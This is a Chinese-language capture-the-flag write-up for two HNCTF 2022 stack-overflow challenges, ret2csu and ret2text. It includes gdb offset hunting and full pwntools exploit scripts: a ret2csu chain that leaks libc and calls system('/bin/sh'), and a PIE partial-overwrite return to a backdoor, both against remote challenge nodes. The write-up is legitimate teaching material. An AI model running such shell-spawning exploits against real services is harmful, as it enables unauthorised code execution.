ret2csu

[HNCTF 2022 WEEK2]ret2csu

准备


64位就开了NX保护

分析

main函数

1
2
3
4
5
6
7
8
9
int __fastcall main(int argc, const char **argv, const char **envp)
{
  setbuf(stdin, 0LL);
  setbuf(stderr, 0LL);
  setbuf(_bss_start, 0LL);
  write(1, "Start Your Exploit!\n", 0x14uLL);
  vuln();
  return 0;
}

有一个vuln函数

vuln函数

1
2
3
4
5
6
7
8
ssize_t vuln()
{
  _BYTE buf[256]; // [rsp+0h] [rbp-100h] BYREF

  write(1, "Input:\n", 7uLL);
  read(0, buf, 0x200uLL);
  return write(1, "Ok.\n", 4uLL);
}

读取输入最大512(0x200)个字节到buf,但buf大小为256,所以存在缓冲区溢出

思路:

根据题目介绍,这题是ret2csu,所以着重看_libc_csu_init函数的汇编,有了可用的寄存器后,正常打ret2libc
libc_csu_init函数的汇编重点段


用gdb得到偏移量

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
motaly@motaly-VMware-Virtual-Platform:~$ gdb csu
GNU gdb (Ubuntu 15.0.50.20240403-0ubuntu1) 15.0.50.20240403-git
Copyright (C) 2024 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 177 pwndbg commands and 46 shell commands. Type pwndbg [--shell | --all] [filter] for a list.
pwndbg: created $rebase, $base, $hex2ptr, $argv, $envp, $argc, $environ, $bn_sym, $bn_var, $bn_eval, $ida GDB functions (can be used with print/break)
Reading symbols from csu...

This GDB supports auto-downloading debuginfo from the following URLs:
  <https://debuginfod.ubuntu.com>
Debuginfod has been disabled.
To make this setting permanent, add 'set debuginfod enabled off' to .gdbinit.
(No debugging symbols found in csu)
------- tip of the day (disable with set show-tips off) -------
Calling functions like call (void)puts("hello world") will run all other target threads for the time the function runs. Use set scheduler-locking on to lock the execution to current thread when calling functions
pwndbg> cyclic 1000
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaacoaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaae
pwndbg> r
Starting program: /home/motaly/csu 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Start Your Exploit!
Input:
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaacoaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaae
Ok.

Program received signal SIGSEGV, Segmentation fault.
0x00000000004011db in vuln ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]─────────────────────────────────────────────────────────────────
 RAX  4
 RBX  0x7fffffffd848 —▸ 0x7fffffffdc16 ◂— '/home/motaly/csu'
 RCX  0x7ffff7d1c574 (write+20) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  4
 RDI  1
 RSI  0x40200c ◂— 0x617453000a2e6b4f /* 'Ok.\n' */
 R8   0x4012c0 (__libc_csu_fini) ◂— endbr64 
 R9   0x7ffff7fca380 (_dl_fini) ◂— endbr64 
 R10  0x7ffff7c109d8 ◂— 0x11001200001bd3
 R11  0x202
 R12  1
 R13  0
 R14  0
 R15  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 ◂— 0
 RBP  0x6261616161616168 ('haaaaaab')
 RSP  0x7fffffffd718 ◂— 0x6261616161616169 ('iaaaaaab')
 RIP  0x4011db (vuln+101) ◂— ret 
─────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]──────────────────────────────────────────────────────────────────────────
 ► 0x4011db <vuln+101>    ret                                <0x6261616161616169>










───────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd718 ◂— 0x6261616161616169 ('iaaaaaab')
01:0008│     0x7fffffffd720 ◂— 0x626161616161616a ('jaaaaaab')
02:0010│     0x7fffffffd728 ◂— 0x626161616161616b ('kaaaaaab')
03:0018│     0x7fffffffd730 ◂— 0x626161616161616c ('laaaaaab')
04:0020│     0x7fffffffd738 ◂— 0x626161616161616d ('maaaaaab')
05:0028│     0x7fffffffd740 ◂— 0x626161616161616e ('naaaaaab')
06:0030│     0x7fffffffd748 ◂— 0x626161616161616f ('oaaaaaab')
07:0038│     0x7fffffffd750 ◂— 'paaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaac'
─────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────────────────────
 ► 0         0x4011db vuln+101
   1 0x6261616161616169 None
   2 0x626161616161616a None
   3 0x626161616161616b None
   4 0x626161616161616c None
   5 0x626161616161616d None
   6 0x626161616161616e None
   7 0x626161616161616f None
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> oaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaae
Undefined command: "oaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaae".  Try "help".
pwndbg> cyclic  -l 0x6261616161616169
Finding cyclic pattern of 8 bytes: b'iaaaaaab' (hex: 0x6961616161616162)
Found at offset 264

得到偏移量为264
用ROPgadget获得寄存器

根据ret2csu的知识点写出对应的csu的payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
from pwn import *
from LibcSearcher import *
context(arch='amd64',log_level='debug')
io=remote('node5.anna.nssctf.cn',24027)
# io=process('/home/motaly/csu')
elf=ELF('/home/motaly/csu')

write_got = elf.got['write']
main_addr = 0x4011DC
csu1_addr = 0x4012A6
csu2_addr = 0x401290
rdi = 0x4012b3

def csu(r12, r13, r14, r15, last):
	payload=b'a'*264
	payload+=p64(csu1_addr)+p64(0)     #pop rbx,rbp,r12,r13,r14,r15  rsp+8
	payload+=p64(0)+p64(1)             #rbx=0 call指令跳转到r15  rbp=1 不重新执行2段
	payload+=p64(r12)+p64(r13)+p64(r14)+p64(r15)   # rdi=edi=r12 rsi=r13 rdx=r14 r15是我们想调用的函数
	payload+=p64(csu2_addr)
	payload+=b'a'*56+p64(last)         #填充 最后返回地址
	io.sendline(payload)

然后正常打ret2libc(这题不用考虑堆栈平衡,不用ret值)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
def csu(r12, r13, r14, r15, last):
	payload=b'a'*264
	payload+=p64(csu1_addr)+p64(0)     #pop rbx,rbp,r12,r13,r14,r15  rsp+8
	payload+=p64(0)+p64(1)             #rbx=0 call指令跳转到r15  rbp=1 不重新执行2段
	payload+=p64(r12)+p64(r13)+p64(r14)+p64(r15)   # rdi=edi=r12 rsi=r13 rdx=r14 r15是我们想调用的函数
	payload+=p64(csu2_addr)
	payload+=b'a'*56+p64(last)         #填充 最后返回地址
	io.sendline(payload)

io.recvuntil("Input:\n")
# write(1,write_got,8)
csu(1, write_got, 8, write_got, main_addr)

io.recv()
write_addr = u64(io.recv(6).ljust(8, b'\x00'))
log.success('write :'+hex(write_addr))

libc=LibcSearcher("write", write_addr)
libc_base=write_addr-libc.dump('write')
log.success('libc_base: ' + hex(libc_base))
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump("str_bin_sh")

payload=b'a'*264+p64(rdi)+p64(bin_sh)+p64(system)
io.recvuntil("Input:\n")
io.sendline(payload)

脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
from pwn import *
from LibcSearcher import *
context(arch='amd64',log_level='debug')
io=remote('node5.anna.nssctf.cn',23900)
# io=process('/home/motaly/csu')
elf=ELF('/home/motaly/csu')

write_got = elf.got['write']
main_addr = 0x4011DC
csu1_addr = 0x4012A6
csu2_addr = 0x401290
rdi = 0x4012b3

def csu(r12, r13, r14, r15, last):
	payload=b'a'*264
	payload+=p64(csu1_addr)+p64(0)     #pop rbx,rbp,r12,r13,r14,r15  rsp+8
	payload+=p64(0)+p64(1)             #rbx=0 call指令跳转到r15  rbp=1 不重新执行2段
	payload+=p64(r12)+p64(r13)+p64(r14)+p64(r15)   # rdi=edi=r12 rsi=r13 rdx=r14 r15是我们想调用的函数
	payload+=p64(csu2_addr)
	payload+=b'a'*56+p64(last)         #填充 最后返回地址
	io.sendline(payload)

io.recvuntil("Input:\n")
# write(1,write_got,8)
csu(1, write_got, 8, write_got, main_addr)

io.recv()
write_addr = u64(io.recv(6).ljust(8, b'\x00'))
log.success('write :'+hex(write_addr))

libc=LibcSearcher("write", write_addr)
libc_base=write_addr-libc.dump('write')
log.success('libc_base :'+hex(libc_base))
system=libc_base+libc.dump('system')
bin_sh=libc_base+libc.dump("str_bin_sh")

payload=b'a'*264+p64(rdi)+p64(bin_sh)+p64(system)
io.recvuntil("Input:\n")
io.sendline(payload)

io.interactive()

ret2text

[HNCTF 2022 WEEK2]ret2text

准备


64 位,开了 PIE 保护

分析

main函数

1
2
3
4
5
6
7
8
9
10
11
int __fastcall main(int argc, const char **argv, const char **envp)
{
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  puts("Do you konw ret2text?");
  puts("It's a easy challenge");
  vuln();
  puts("You failed.");
  return 0;
}

有一个 vuln 函数

vuln函数

1
2
3
4
5
6
7
__int64 vuln()
{
  _BYTE buf[256]; // [rsp+0h] [rbp-100h] BYREF

  read(0, buf, 0x140uLL);
  return 0LL;
}

读取输入最大 320(0x140) 个字节到 buf ,但 buf 大小为 256,所以存在缓冲区溢出

backdoor函数(后门函数)

1
2
3
4
int backdoor()
{
  return system("/bin/sh");
}

直接的连接点

思路:

这题有栈溢出和直接的连接点,但开了 PIE 保护,所以就是一个简单的 PIE 绕过
gdb 调试得到偏移量

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
motaly@motaly-VMware-Virtual-Platform:~$ gdb text
GNU gdb (Ubuntu 15.0.50.20240403-0ubuntu1) 15.0.50.20240403-git
Copyright (C) 2024 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
    <http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".
Type "apropos word" to search for commands related to "word"...
pwndbg: loaded 177 pwndbg commands and 46 shell commands. Type pwndbg [--shell | --all] [filter] for a list.
pwndbg: created $rebase, $base, $hex2ptr, $argv, $envp, $argc, $environ, $bn_sym, $bn_var, $bn_eval, $ida GDB functions (can be used with print/break)
Reading symbols from text...

This GDB supports auto-downloading debuginfo from the following URLs:
  <https://debuginfod.ubuntu.com>
Debuginfod has been disabled.
To make this setting permanent, add 'set debuginfod enabled off' to .gdbinit.
(No debugging symbols found in text)
------- tip of the day (disable with set show-tips off) -------
Use the vmmap command for a better & colored memory maps display (than the GDB's info proc mappings)
pwndbg> cyclic 500
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa
pwndbg> r
Starting program: /home/motaly/text 
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Do you konw ret2text?
It's a easy challenge
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa

Program received signal SIGSEGV, Segmentation fault.
0x00005555555551dc in vuln ()
LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA
────────────────────────────────────────────────────────────────────────────[ REGISTERS / show-flags off / show-compact-regs off ]────────────────────────────────────────────────────────────────────────────
 RAX  0
 RBX  0x7fffffffd848 —▸ 0x7fffffffdc14 ◂— '/home/motaly/text'
 RCX  0x7ffff7d1ba61 (read+17) ◂— cmp rax, -0x1000 /* 'H=' */
 RDX  0x140
 RDI  0
 RSI  0x7fffffffd610 ◂— 0x6161616161616161 ('aaaaaaaa')
 R8   0x15
 R9   0x7ffff7fca380 (_dl_fini) ◂— endbr64 
 R10  0x7ffff7c109d8 ◂— 0x11001200001bd3
 R11  0x246
 R12  1
 R13  0
 R14  0
 R15  0x7ffff7ffd000 (_rtld_global) —▸ 0x7ffff7ffe2e0 —▸ 0x555555554000 ◂— 0x10102464c457f
 RBP  0x6261616161616168 ('haaaaaab')
 RSP  0x7fffffffd718 ◂— 0x6261616161616169 ('iaaaaaab')
 RIP  0x5555555551dc (vuln+51) ◂— ret 
─────────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]─────────────────────────────────────────────────────────────────────────────────────
 ► 0x5555555551dc <vuln+51>    ret                                <0x6261616161616169>










──────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]───────────────────────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd718 ◂— 0x6261616161616169 ('iaaaaaab')
01:0008│     0x7fffffffd720 ◂— 0x626161616161616a ('jaaaaaab')
02:0010│     0x7fffffffd728 ◂— 0x626161616161616b ('kaaaaaab')
03:0018│     0x7fffffffd730 ◂— 0x626161616161616c ('laaaaaab')
04:0020│     0x7fffffffd738 ◂— 0x626161616161616d ('maaaaaab')
05:0028│     0x7fffffffd740 ◂— 0x626161616161616e ('naaaaaab')
06:0030│     0x7fffffffd748 ◂— 0x626161616161616f ('oaaaaaab')
07:0038│     0x7fffffffd750 —▸ 0x7fffffffd848 —▸ 0x7fffffffdc14 ◂— '/home/motaly/text'
────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────────────────────────────────────────────────────────────────
 ► 0   0x5555555551dc vuln+51
   1 0x6261616161616169 None
   2 0x626161616161616a None
   3 0x626161616161616b None
   4 0x626161616161616c None
   5 0x626161616161616d None
   6 0x626161616161616e None
   7 0x626161616161616f None
──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> paaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa
Undefined command: "paaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaa".  Try "help".
pwndbg> cyclic -l 0x6261616161616169
Finding cyclic pattern of 8 bytes: b'iaaaaaab' (hex: 0x6961616161616162)
Found at offset 264

得到偏移量为 264
在用 gdb 调试查看 PIEbackdoor 地址关系
vuln 处下断点,然后运行程序

一直用 ni 执行单步命令,到输入点是随便给一个值

直到运行至 vuln 函数最后

查看 backdoor 汇编代码和 PIE 的值
结合 idabackdoor 的偏移

可以发现 PIE+偏移=backdoor的地址 ( 0x555555554000+0x11DD=0x5555555551dd )
因为 PIE 的随机变化,所以这里 backdoor 的地址后三位 0x1DD 是不变的,主要变的是第四位,有 1/16 的概率,我们随便给一个值进行连接时,是正好的那个值,这里直接用偏移值 0x11DD

在加上题目给的提示,存在栈对齐,所以加上 8 字节的对齐,也就是 0x11DD+8=0x11E5
然后构造 ROP

1
2
payload=b'a'*0x108+p16(0x11E5)
io.sendafter(b"It's a easy challenge",payload)

脚本

这里多尝试几次,就可以连通(十几次也是有可能的,多尝试)

1
2
3
4
5
6
7
8
9
from pwn import *
context(os='linux',log_level = 'debug',arch='amd64')
io=remote('node5.anna.nssctf.cn',22111)
# io= process('/home/motaly/text')

payload=b'a'*0x108+p16(0x11E5)
io.sendafter(b"It's a easy challenge",payload)

io.interactive()